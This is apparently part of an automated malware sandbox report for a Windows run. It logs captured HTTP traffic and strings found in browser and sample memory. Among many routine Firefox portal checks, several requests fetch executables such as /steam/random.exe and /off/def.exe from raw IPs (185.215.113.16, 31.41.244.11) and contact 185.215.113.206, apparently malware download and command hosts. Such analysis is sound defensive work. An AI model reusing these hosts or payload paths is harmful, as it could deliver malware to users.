Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11

Source: firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/UpdateService:_postUpdateProcessing - removing downloading patch because we installed a different patch before it finisheddownloading.UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts.[{incognito:null, tabId:null, types:["sub_frame"], urls:["://trends.google.com/trends/embed"], windowId:null}, ["blocking", "requestHeaders"]]UPDATE moz_bookmarks SET position = position + 1 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://securepubads.g.doubleclick.net/gampad/adresource://search-extensions/google/amazondotcom%40search.mozilla.org:1.6resource://search-extensions/wikipedia/color-mix(in srgb, currentColor 9%, transparent)://www.facebook.com/platform/impression.php*://pubads.g.doubleclick.net/gampad/ad*://.adsafeprotected.com//Serving/://.adsafeprotected.com/jsvid?*://.adsafeprotected.com//unit/://.adsafeprotected.com/services/pub*unavailable:FEATURE_FAILURE_D2D_D3D11_COMP equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://web-assets.toggl.com/app/assets/scripts/.js://.imgur.com/js/vendor..bundle.js://ssl.google-analytics.com/ga.js@mozilla.org/addons/addon-manager-startup;1pictureinpicture%40mozilla.org:1.0.0://www.google-analytics.com/analytics.js://www.google-analytics.com/gtm/jsFileUtils_closeSafeFileOutputStreamhttps://smartblock.firefox.etp/play.svg://static.criteo.net/js/ld/publishertag.jsFileUtils_closeAtomicFileOutputStream://connect.facebook.net//sdk.jswebcompat-reporter@mozilla.org.xpi://www.rva311.com/static/js/main..chunk.js://s0.2mdn.net/instream/html5/ima3.js://www.googletagmanager.com/gtm.js*://imasdk.googleapis.com/js/sdkloader/ima3.js://pub.doubleverify.com/signals/pub.js://www.googletagservices.com/tag/js/gpt.js://track.adform.net/serving/scripts/trackpoint/://static.chartbeat.com/js/chartbeat_video.js://auth.9c9media.ca/auth/main.js://libs.coremetrics.com/eluminate.jshttps://smartblock.firefox.etp/facebook.svgwebcompat-reporter%40mozilla.org:1.5.1://static.chartbeat.com/js/chartbeat.js://www.everestjs.net/static/st.v3.js://c.amazon-adsystem.com/aax2/apstag.js://cdn.branch.io/branch-latest.min.js*://.imgur.io/js/vendor..bundle.js://connect.facebook.net//all.js*://www.google-analytics.com/plugins/ua/ec.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000003.3371532481.00000269E47A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000003.3371532481.00000269E47A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", 